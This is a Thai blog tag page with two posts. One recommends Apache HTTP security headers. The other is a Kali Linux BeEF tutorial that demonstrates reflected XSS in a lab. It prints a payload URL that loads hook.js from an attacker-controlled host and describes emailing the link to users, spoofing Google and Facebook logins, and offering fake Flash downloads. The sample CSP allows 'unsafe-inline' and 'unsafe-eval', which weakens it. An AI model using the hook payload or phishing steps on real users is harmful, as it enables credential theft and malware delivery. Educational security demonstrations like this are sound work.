Tag: xss

  • Hardening your HTTP response headers

    Introduction

    HTTP Response headers คือ ค่าของสตริงที่ส่งกลับมาจากเซิร์ฟเวอร์ที่มีเนื้อหาตามที่ถูกร้องขอ โดยปกติจะใช้บอกข้อมูลทางเทคนิค เช่น เบราเซอร์ควรแคชเนื้อหา, ประเภทของเนื้อหาคืออะไร, ซอฟต์แวร์ที่ทำงานบนเซิร์ฟเวอร์ และอื่น ๆ   HTTP Response headers ถูกใช้เพื่อส่งต่อนโยบายความปลอดภัยไปยังเบราเซอร์  ทำให้การเปิดเว็บไซต์ของเรามีความปลอดภัยเพิ่มมากขึ้น

    Header ของ Apache2 ที่ควรต้องใส่เพื่อเพิ่มความปลอดภัยมีดังนี้

    Content Security Policy

    Header เรื่อง Content Security Policy (CSP) ช่วยให้กำหนดต้นทางของเนื้อหาที่อนุญาตสำหรับเว็บไซต์ โดยการจำกัดเนื้อหาที่เบราเซอร์สามารถโหลดได้ ได้แก่ js และ css

    สามารถสร้าง CSP ได้จาก https://report-uri.com/home/generate ทั้งนี้ต้องทดสอบการทำงานทุกครั้งเนื่องจาก การกำหนดค่าบางอย่างอาจทำให้เว็บไซต์ ทำงานไม่ถูกต้อง ดูรายละเอียดเพิ่มเติมได้ที่ https://scotthelme.co.uk/content-security-policy-an-introduction/ สำหรับ Apache2 เพิ่ม Header ต่อไปนี้ ในแฟ้มของไซต์ที่ต้องการ เช่น /etc/apache2/site-enabled/lsc-ssl.conf  หรือแฟ้ม .htaccess ในไซต์ที่ต้องการ (ซึ่งแนะนำว่าใช้ .htaccess จะได้ไม่ต้องรีสตาร์ทเซิร์ฟเวอร์) เพื่อเปิดการใช้งาน CSP


    Header always set Content-Security-Policy "default-src https: data: 'unsafe-inline' 'unsafe-eval'"

    HTTP Strict Transport Security (HSTS)

    เว็บไซต์ ต้องมีการตั้งค่าให้ redirect จาก HTTP ไปยัง HTTPS เสมอ และ HSTS จะเป็น Header ที่กำหนดให้เบราเซอร์จำสถานะของ HTTPS เอาไว้แม้ว่าจะเป็นการเปิดจาก bookmark ที่เป็น HTTP ก็ตาม ก็จะถูกบังคับให้เป็น HTTPS รายละเอียดเพิ่มเติม https://scotthelme.co.uk/hsts-the-missing-link-in-tls/ เช่น เมื่อเปิด http://licensing.psu.ac.th ก็จะถูก redirect ไป https://licensing.psu.ac.th

    Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"

    X-Frame-Options

    X-Frame-Options หรือ XFO header จะช่วยป้องกันผู้ใช้จากการโจมตีแบบ clickjacking ที่ผู้บุกรุกสามารถโหลด iframe จากไซต์ของเขาบนไซต์ของเราได้ ซึ่งทำให้ผู้ใช้งานเว็บไซต์ของเราเชื่อว่าไม่อันตราย!! รายละเอียดเพิ่มเติม https://www.troyhunt.com/clickjack-attack-hidden-threat-right-in/

    Header always set X-Frame-Options "SAMEORIGIN"

    X-Xss-Protection

    Header นี้ใช้กำหนดค่าการป้องกัน XSS ที่มีอยู่บนเบราเซอร์ต่างๆ โดยการตั้งค่าจะมี 0 คือ ปิดการทำงาน 1 คือเปิดการทำงาน และ 1; mode=block ซึ่งจะกำหนดให้เบราเซอร์ทำการบล็อคการกระทำใดๆ ก็ตามที่มากกว่าการล้างข้อมูลสคริปต์

    Header always set X-Xss-Protection "1; mode=block"

    X-Content-Type-Options

    X-Content-Type-Options ใช้ในการป้องกันการโจมตีผ่านทางช่องโหว่ MIME sniffing ซึ่งจะเกิดเมื่อ เว็บไซต์อนุญาตให้ผู้ใช้อัพโหลดเนื้อหาไปยังเซิร์ฟเวอร์ ซึ่งผู้ใช้อาจเปลี่ยนหรือซ่อนไฟล์อันตราย แล้วอัพโหลดขึ้นเซิร์ฟเวอร์ รายละเอียดเพิ่มเติม https://www.keycdn.com/support/x-content-type-options/

    Header always set X-Content-Type-Options "nosniff"

    เบื้องต้นแนะนำเท่านี้ก่อนครับ พิเศษ!! สำหรับผู้ใช้งาน wordpress มีปลั๊กอินชื่อ HTTP Headers ใช่ตั้งค่า Header ต่างๆ ที่เล่ามาข้างต้นได้อย่างสบายใจหายห่วง!!! ไม่ต้องแก้ .htaccess ไม่ต้องแก้ config ใด ๆ  เมื่อติดตั้งเสร็จแล้วจะพบว่ามี Header อีกมากที่สามารถตั้งค่าเพิ่มเติมได้ ซึ่งจะกล่าวอีกในครั้งต่อ ๆ ไป

    ต้นฉบับ

    https://scotthelme.co.uk/hardening-your-http-response-headers/

    มีวิธีการเซ็ตสำหรับ Nginx และ IIS สามารถดูเพิ่มเติมได้ครับ
    อย่าลืม!!

    ตรวจ HTTP Response ได้ที่ https://securityheaders.com

    จบขอให้สนุก

  • วิธีใช้งาน Kali Linux – BeEF – XSS Framework

    จาก วิธีใช้งาน Kali Linux – OWASP Zap – Active Scan ได้แสดงให้เห็นว่า เมื่อตรวจเจอช่องโหว่ Cross Site Scripting (XSS) บนเครื่องเป้าหมาย

    2559-10-17-11_11_17-program-manager

    จากที่ได้เคยบรรยายไปใน Web Hacking and Security Workshop เรื่อง วิธีตรวจสอบเว็บไซต์ที่โดน Hack #9 : วิธีการ Hack ด้วย SQL Injection และ Cross-Site Scripting ซึ่งแสดงให้เห็นว่า หากมีช่องโหว่ดังกล่าว ทำให้สามารถใส่ JavaScript ลงไปได้

    2559-10-24-10_46_51-desktop-running-oracle-vm-virtualbox

    2559-10-24-10_47_34-program-manager

    ซึ่งอาจจะดูไม่น่าจะอันตรายอะไร แต่ ถ้า Hacker พบช่องโหว่ XSS (reflected) นี้บน Website ของเรา แล้วส่ง URL ที่แนบ JavaScript ไปหลอกผู้ใช้ของเรา อาจจะเป็นทาง Email ก็จะเป็นปัญหาได้

    ต่อไปนี้ จะแนะนำอีกเครื่องมือหนึ่ง ที่ชื่อว่า BeEF XSS Framework ใน Kali Linux ดังวิธีการใช้งาน “เบื้องต้น” ให้เห็นอันตรายของช่องโหว่นี้ ดังนี้

    1. เปิด Application > 08 Exploitation Tools > beef xss framework
      2559-10-24-11_31_21-kali-light-running-oracle-vm-virtualbox
    2. เมื่อระบบทำงานแล้ว ให้ copy Example Hook ไว้ก่อน แล้วมา Login BeEF Website โดยใส่ username/password เป็น beef/beef
      2559-10-24-11_34_53-program-manager
    3. ต่อไป อาจจะส่ง email ไปหลอกผู้ใช้ของระบบ โดยใส่ Link เป็น
      http://192.168.56.101/xss/simple.php?name=<script src=”http://192.168.56.102:3000/hook.js”></script>
      โดยในที่นี้
      192.168.56.101 เป็น Website ที่มีช่องโหว่ XSS
      192.168.56.102 เป็น BeEF Server ของ Hacker ที่เปิด port 3000 รอให้ Download hook.js ไปติดตั้ง
      หากผู้ใช้โดนหลอกให้คลิก จะปรากฏภาพดังนี้
      2559-10-24-11_38_13-desktop-running-oracle-vm-virtualbox
    4. เมื่อมีผู้ใช้โดนหลอกให้คลิกเรียบร้อย ทาง Hacker ที่ใช้ BeEF จะเห็นหน้าจอดังนี้
      2559-10-24-11_42_22-program-manager
    5. BeEF สามารถรู้รายละเอียดของ Browser ของเป้าหมายได้
      2559-10-24-11_43_50-program-manager
    6. ในเมนู Command สามารถทำอะไรได้หลายอย่าง
      2559-10-24-11_45_09-start
    7. เมื่อเลือก Browser > Hooked Domain > Get Page HREFs2559-10-24-11_46_37-kali-light-running-oracle-vm-virtualbox
      แล้วคลิก Execute จากนั้น มาดูผลงานใน Command results ก็จะเห็นว่า ใน Page ของผู้ใช้ มี Link เดิมเป็น http://xssattackexamples.com เป็นต้น
      2559-10-24-11_47_05-kali-light-running-oracle-vm-virtualbox

      จากนั้น เลือก Replace HREFs เป็น http://beefproject.com/ แล้วคลิก Execute
      2559-10-24-11_47_31-program-manager

      ตรวจสอบผลงาน พบว่า Link ถูกเปลี่ยนไป 2 ตำแหน่ง
      2559-10-24-11_47_50-kali-light-running-oracle-vm-virtualbox
      ผู้ใช้จะเห็น Link เปลี่ยนไปดังภาพ
      2559-10-24-11_48_18-desktop-running-oracle-vm-virtualbox
    8. สั่งให้ Pop Dialog ถามรหัสผ่านผู้ใช้ (แบบบ้านๆ)
      2559-10-24-11_56_42-program-manager 2559-10-24-11_56_58-program-manager
    9. สั่งให้หลอกถาม username/password ของ Google
      2559-10-24-12_00_14-kali-light-running-oracle-vm-virtualbox 2559-10-24-12_00_38-program-manager
    10. สั่งให้หลอกถามแบบ Facebook
      2559-10-24-12_04_35-program-manager 2559-10-24-12_05_00-desktop-running-oracle-vm-virtualbox
    11. และหลอกให้ download Flash Player แต่จริงๆแล้วเป็น Virus/Malware/Ransomware
      2559-10-24-12_02_18-kali-light-running-oracle-vm-virtualbox 2559-10-24-12_04_11-desktop-running-oracle-vm-virtualbox